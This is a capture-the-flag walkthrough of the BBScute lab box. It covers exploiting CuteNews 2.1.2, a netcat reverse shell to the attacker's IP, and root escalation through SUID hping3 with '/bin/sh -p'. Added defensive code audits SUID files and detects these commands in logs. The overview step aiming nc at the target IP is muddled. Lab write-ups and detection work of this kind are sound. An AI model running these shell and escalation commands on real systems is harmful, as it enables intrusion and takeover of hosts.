This walkthrough is for the box BBScute on Offsec’s Proving Grounds
It’s a rainy, cold day so I’m staying in to hack a box.
– Nmap scan, found 22, 80, 88, 110 and 995 open
– Browse to the IP and notice CuteNews 2.1.2 at the bottom of index.php
– Searchsploit found a python script that exploits a known vuln.
– Somehow found that I needed to $ sed -i 's:CuteNews/::g' 48800.py found in searchsploit. Stumbled upon that.
– python3 48800.py and enter http://192.168.211.128; it dumps you into an unprivileged shell as the www-data user
– You must enter http:// without the index.php
– The script connects, exploits the target, and also lists the user account/password you can use to log into the platform:
– Registration successful with username: vGOU9LOe1c and password: vGOU9LOe1c (Or some random characters)
So, go to http://target/index.php and login. Maybe file upload for lfi?
– Review of the steps to get a shell
– Upgrade the shell with netcat: nc 192.168.45.169 4444 -e /bin/bash (or some other free port)
– First open your netcat listener with nc -nvlp 4444
– You get a better shell and can find the first flag with find / -name flag.txt 2>/dev/null
– Then harden the shell with python3 -c 'import pty; pty.spawn("/bin/bash")' for a nice, toasty shell
– Don’t do anything in a remote shell that would cause you to do a Ctrl+C because it also kills the shell. (Like, don’t ping or wget stuff.)
– While you’re there, get /etc/passwd for usernames:
fox:x:1000:1000:fox,,,:/home/fox:/bin/bash
– Flag was found in var/www/local.txt, so flags can be anywhere, but more commonly they're in the /home/username directory
– find / -perm -u=s -type f 2>/dev/null (-u=s finds suid bit files for exploit) Found a few incl chsh, chfn, gpasswd, su, pkexec, sudo, umount, newgrp, fus>
– Hopped over to gtfobins.github.io to find something on hping3. Keyword search hping3, then click suid
– Run hping3 (it executes as root because of the SUID bit), then launch /bin/sh -p from it and it dumps you into a root shell; cd into /root/ for proof.txt
Sweet.
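The `find / -perm -u=s -type f` step above is, from the defender's side, exactly what a periodic SUID audit should run: list every setuid file and flag anything that is not a known, expected binary (a packet tool such as hping3 carrying the SUID bit hands root to any local user, as the walkthrough shows). The following is an added example of my own, not code from the box, from OffSec or from the post's author; the baseline set of "normal" SUID names is an assumption to tune per image, and the demo tree it builds is constructed, not a real host.

```python
import os
import stat
import tempfile
from typing import Iterable, List

# Assumed baseline of SUID binaries usually expected on a Debian-like host.
# Basenames are compared so /bin vs /usr/bin differences do not matter.
BASELINE_SUID = {
    "chsh", "chfn", "gpasswd", "su", "pkexec", "sudo", "umount", "newgrp",
    "passwd", "mount", "fusermount",
}


def find_suid(root: str) -> List[str]:
    """Equivalent of `find ROOT -perm -u=s -type f`: regular files with the setuid bit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(root: str, baseline: Iterable[str] = BASELINE_SUID) -> List[str]:
    """SUID files whose basename is not in the baseline.

    Each hit needs a human decision: remove the bit (chmod u-s), reinstall
    the package, or add it to the baseline with a written justification.
    """
    allowed = set(baseline)
    return [p for p in find_suid(root) if os.path.basename(p) not in allowed]


def build_demo_tree() -> str:
    """Constructed demo tree (not a real host): an expected sudo, a stray
    setuid hping3, and a plain ls without the bit."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "usr", "sbin")
    os.makedirs(bindir)
    for name, mode in (("sudo", 0o4755), ("hping3", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)  # the owner may set setuid on their own file
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_demo_tree()
    for hit in unexpected_suid(target):
        print("REVIEW:", hit)
```

Run it as `python3 suid_audit.py /` on a real host (as root, so every directory is readable) and diff the output against the previous run; a new name appearing in the list is the signal worth an alert.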
Overview for getting reverse shell:
1. Run python script, target is http://192.168.211.128
2. Then nc back into your box with nc 192.168.211.128
3. From your listening nc -nvlp 4444, improve the shell with python3 -c 'import pty; pty.spawn("/bin/bash")'
4. Don’t use any command that could require you do a ctrl+c because that also breaks the shell. You don’t want that.
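Each step of the chain above leaves a distinctive process execution on the target: netcat started with `-e` and a shell, python spawning a pty, and `/bin/sh -p` with a setuid binary as its parent. The block below is an added example of mine, not part of the original post, that runs simple detection rules over constructed process-exec log lines (the field layout `uid=… pcomm=… comm=… args="…"` is assumed, as is the log content) and correlates the hits per UID so the www-data to root progression stands out.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-exec log lines, made up for this example.
# Assumed layout: timestamp host uid pcomm (parent comm) comm args="...".
SAMPLE_LOG = """\
2024-05-01T10:00:01Z host=web01 uid=33 pcomm=apache2 comm=nc args="nc 192.168.45.169 4444 -e /bin/bash"
2024-05-01T10:00:05Z host=web01 uid=33 pcomm=bash comm=python3 args="python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
2024-05-01T10:01:10Z host=web01 uid=33 pcomm=hping3 comm=sh args="/bin/sh -p"
2024-05-01T10:02:00Z host=web01 uid=1000 pcomm=bash comm=ls args="ls -la /home/fox"
2024-05-01T10:02:30Z host=web01 uid=33 pcomm=bash comm=nc args="nc -zv 127.0.0.1 80"
"""

RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # netcat told to attach a shell to the connection (reverse or bind shell)
    ("netcat_exec_shell", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s+\S*sh\b")),
    # interactive TTY upgrade of a dumb shell
    ("pty_spawn", re.compile(r"pty\.spawn\(")),
    # shell started with -p (keep the effective uid instead of dropping it)
    ("shell_keep_euid", re.compile(r"(?:^|[\s/\"'])(?:sh|bash|dash)\s+-p\b")),
]


def scan(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per (line, rule) match, with uid, parent and args extracted."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        uid = re.search(r"\buid=(\d+)", line)
        pcomm = re.search(r"\bpcomm=(\S+)", line)
        args = re.search(r'args="(.*)"\s*$', line)  # greedy: args may contain quotes
        for rule, pattern in RULES:
            if pattern.search(line):
                findings.append({
                    "line": lineno,
                    "rule": rule,
                    "uid": int(uid.group(1)) if uid else None,
                    "parent": pcomm.group(1) if pcomm else None,
                    "args": args.group(1) if args else line,
                })
    return findings


def chains_by_uid(findings: List[Dict[str, object]]) -> Dict[int, List[str]]:
    """Ordered rule names per uid: a low-privilege uid that trips
    netcat_exec_shell and then shell_keep_euid is the escalation story."""
    chains: Dict[int, List[str]] = {}
    for f in findings:
        if isinstance(f["uid"], int):
            chains.setdefault(f["uid"], []).append(str(f["rule"]))
    return chains


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"line {h['line']}: {h['rule']} uid={h['uid']} parent={h['parent']} :: {h['args']}")
    print(chains_by_uid(hits))
```

The `shell_keep_euid` finding is the one to treat as high severity when the parent is not a shell or terminal, because a shell asking to keep its effective UID only matters when that UID was raised by a setuid parent.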
Why hping3 with suid bit and /bin/sh -p worked:
– The -p flag in sh (POSIX shell, or often dash or bash) means do not drop privileges: keep the effective UID (which, thanks to setuid, is root) instead of resetting it to the real UID of the user who ran hping3
– Normally, when a shell is launched from a SUID binary by a non-root user, its effective UID (root) differs from its real UID (the user), and it resets the effective UID to the real one, i.e. it drops the privileges.
– But -p explicitly tells it not to, so the shell keeps running with EUID 0 (root).